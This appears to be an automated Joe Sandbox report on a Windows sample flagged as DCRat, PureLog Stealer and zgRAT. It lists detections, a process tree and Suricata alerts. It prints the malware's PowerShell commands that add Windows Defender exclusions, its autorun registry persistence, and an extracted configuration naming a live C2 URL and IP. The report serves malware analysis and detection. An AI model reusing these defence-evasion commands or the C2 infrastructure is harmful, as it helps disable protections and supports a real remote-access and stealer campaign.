Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PlZA6b48MW.exe

Overview

General Information

Sample name:PlZA6b48MW.exe
renamed because original name is a hash value
Original sample name:32db4bf35b9c2efc730718e2f8cd4fbc.exe
Analysis ID:1586157
MD5:32db4bf35b9c2efc730718e2f8cd4fbc
SHA1:616a5c549f6c1c191f82d8cea82c65e25869241e
SHA256:2fb0b933c97aa9b37e31f7adf38695e8185b61c7d312c183f05fd4256ef38497
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PlZA6b48MW.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\PlZA6b48MW.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
    • csc.exe (PID: 7480 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7532 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC13.tmp" "c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7912 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7920 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7936 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7560 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7972 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8012 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8036 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3084 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7588 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7740 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • PlZA6b48MW.exe (PID: 8380 cmdline: "C:\Users\user\Desktop\PlZA6b48MW.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
        • cmd.exe (PID: 8588 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 8636 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • w32tm.exe (PID: 8648 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • dllhost.exe (PID: 7392 cmdline: "C:\Program Files\Windows Multimedia Platform\dllhost.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • dllhost.exe (PID: 7528 cmdline: "C:\Program Files\Windows Multimedia Platform\dllhost.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • PlZA6b48MW.exe (PID: 7512 cmdline: C:\Users\user\Desktop\PlZA6b48MW.exe MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • PlZA6b48MW.exe (PID: 7508 cmdline: C:\Users\user\Desktop\PlZA6b48MW.exe MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • WtHZilDMhVnOIkoIfPBLn.exe (PID: 7696 cmdline: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • WtHZilDMhVnOIkoIfPBLn.exe (PID: 7684 cmdline: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • PlZA6b48MW.exe (PID: 8256 cmdline: "C:\Users\user\Desktop\PlZA6b48MW.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
    • cmd.exe (PID: 8408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8456 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 8500 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • PlZA6b48MW.exe (PID: 8836 cmdline: "C:\Users\user\Desktop\PlZA6b48MW.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • WtHZilDMhVnOIkoIfPBLn.exe (PID: 8696 cmdline: "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
    • cmd.exe (PID: 8864 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://505905cm.n9shka.top/imagePollLinuxCentral", "MUTEX": "DCR_MUTEX-e0MEoQzZAqT5aSFnG7OI", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
PlZA6b48MW.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    PlZA6b48MW.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\Windows Multimedia Platform\dllhost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\Windows Multimedia Platform\dllhost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000000.1660573401.0000000000062000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Process Memory Space: PlZA6b48MW.exe PID: 7332JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: PlZA6b48MW.exe PID: 8256JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.PlZA6b48MW.exe.60000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.PlZA6b48MW.exe.60000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\PlZA6b48MW.exe, ProcessId: 7332, TargetFilename: C:\Program Files\Windows Multimedia Platform\dllhost.exe
                            Sigma detected: New RUN Key Pointing to Suspicious Folder
                            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PlZA6b48MW.exe, ProcessId: 7332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WtHZilDMhVnOIkoIfPBLn
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PlZA6b48MW.exe", ParentImage: C:\Users\user\Desktop\PlZA6b48MW.exe, ParentProcessId: 7332, ParentProcessName: PlZA6b48MW.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', ProcessId: 7912, ProcessName: powershell.exe
                            Sigma detected: System File Execution Location Anomaly
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files\Windows Multimedia Platform\dllhost.exe", CommandLine: "C:\Program Files\Windows Multimedia Platform\dllhost.exe", CommandLine|base64offset|contains: 2mg, Image: C:\Program Files\Windows Multimedia Platform\dllhost.exe, NewProcessName: C:\Program Files\Windows Multimedia Platform\dllhost.exe, OriginalFileName: C:\Program Files\Windows Multimedia Platform\dllhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files\Windows Multimedia Platform\dllhost.exe", ProcessId: 7392, ProcessName: dllhost.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PlZA6b48MW.exe, ProcessId: 7332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PlZA6b48MW
                            Sigma detected: CurrentVersion NT Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PlZA6b48MW.exe, ProcessId: 7332, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\PlZA6b48MW.exe", ParentImage: C:\Users\user\Desktop\PlZA6b48MW.exe, ParentProcessId: 7332, ParentProcessName: PlZA6b48MW.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline", ProcessId: 7480, ProcessName: csc.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PlZA6b48MW.exe", ParentImage: C:\Users\user\Desktop\PlZA6b48MW.exe, ParentProcessId: 7332, ParentProcessName: PlZA6b48MW.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', ProcessId: 7912, ProcessName: powershell.exe
                            Sigma detected: Dynamic CSharp Compile Artefact
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\PlZA6b48MW.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PlZA6b48MW.exe", ParentImage: C:\Users\user\Desktop\PlZA6b48MW.exe, ParentProcessId: 7332, ParentProcessName: PlZA6b48MW.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', ProcessId: 7912, ProcessName: powershell.exe

                            Data Obfuscation

                            barindex
                            Sigma detected: Dot net compiler compiles file from suspicious location
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\PlZA6b48MW.exe", ParentImage: C:\Users\user\Desktop\PlZA6b48MW.exe, ParentProcessId: 7332, ParentProcessName: PlZA6b48MW.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline", ProcessId: 7480, ProcessName: csc.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-08T19:22:12.441622+010020480951A Network Trojan was detected192.168.2.44973037.44.238.25080TCP
                            2025-01-08T19:22:16.937599+010020480951A Network Trojan was detected192.168.2.44973537.44.238.25080TCP
                            2025-01-08T19:22:23.010082+010020480951A Network Trojan was detected192.168.2.44973837.44.238.25080TCP
                            2025-01-08T19:22:26.775231+010020480951A Network Trojan was detected192.168.2.44973937.44.238.25080TCP
                            2025-01-08T19:22:49.408027+010020480951A Network Trojan was detected192.168.2.44974037.44.238.25080TCP
                            2025-01-08T19:22:58.845549+010020480951A Network Trojan was detected192.168.2.44975337.44.238.25080TCP
                            2025-01-08T19:23:01.873573+010020480951A Network Trojan was detected192.168.2.44976937.44.238.25080TCP
                            2025-01-08T19:23:09.111175+010020480951A Network Trojan was detected192.168.2.44980537.44.238.25080TCP
                            2025-01-08T19:23:12.439331+010020480951A Network Trojan was detected192.168.2.44982637.44.238.25080TCP
                            2025-01-08T19:23:15.569473+010020480951A Network Trojan was detected192.168.2.44984137.44.238.25080TCP
                            2025-01-08T19:23:19.060915+010020480951A Network Trojan was detected192.168.2.44985637.44.238.25080TCP
                            2025-01-08T19:23:45.937610+010020480951A Network Trojan was detected192.168.2.44999837.44.238.25080TCP
                            2025-01-08T19:23:54.634534+010020480951A Network Trojan was detected192.168.2.45001637.44.238.25080TCP
                            2025-01-08T19:23:58.095640+010020480951A Network Trojan was detected192.168.2.45001737.44.238.25080TCP
                            2025-01-08T19:24:02.259011+010020480951A Network Trojan was detected192.168.2.45001837.44.238.25080TCP
                            2025-01-08T19:24:20.595673+010020480951A Network Trojan was detected192.168.2.45001937.44.238.25080TCP
                            2025-01-08T19:24:31.736429+010020480951A Network Trojan was detected192.168.2.45002037.44.238.25080TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: PlZA6b48MW.exeAvira: detected
                            Antivirus detection for URL or domain
                            Source: http://505905cm.n9shka.top/imagePollLinuxCentral.phpAvira URL Cloud: Label: malware
                            Source: http://505905cm.n9shka.topAvira URL Cloud: Label: malware
                            Source: http://505905cm.n9shka.top/Avira URL Cloud: Label: malware
                            Antivirus detection for dropped file
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\GogtzRNUlL.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\Desktop\CwRRQJIe.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                            Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\wA41hAKrBM.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.batAvira: detection malicious, Label: BAT/Delbat.C
                            Found malware configuration
                            Source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://505905cm.n9shka.top/imagePollLinuxCentral", "MUTEX": "DCR_MUTEX-e0MEoQzZAqT5aSFnG7OI", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exeReversingLabs: Detection: 73%
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeReversingLabs: Detection: 73%
                            Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeReversingLabs: Detection: 73%
                            Source: C:\Users\Default\AppData\Roaming\WtHZilDMhVnOIkoIfPBLn.exeReversingLabs: Detection: 73%
                            Source: C:\Users\user\Desktop\CwRRQJIe.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\IXnYeTUQ.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\LARQmQKJ.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\MiiYvNyr.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\OeqoqbNM.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\RCSpyiiu.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\YNJEaDTu.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\ZBNMMRPs.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\bTenUpua.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\dZJDzodr.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\euKdPjTG.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\kAfKNzod.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\kkpLxnoP.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\mSTLtqAw.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\nIcTiRiZ.logReversingLabs: Detection: 70%
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeReversingLabs: Detection: 73%
                            Multi AV Scanner detection for submitted file
                            Source: PlZA6b48MW.exeReversingLabs: Detection: 73%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\CwRRQJIe.logJoe Sandbox ML: detected
                            Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\FvWYGyIe.logJoe Sandbox ML: detected
                            Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: PlZA6b48MW.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"}}
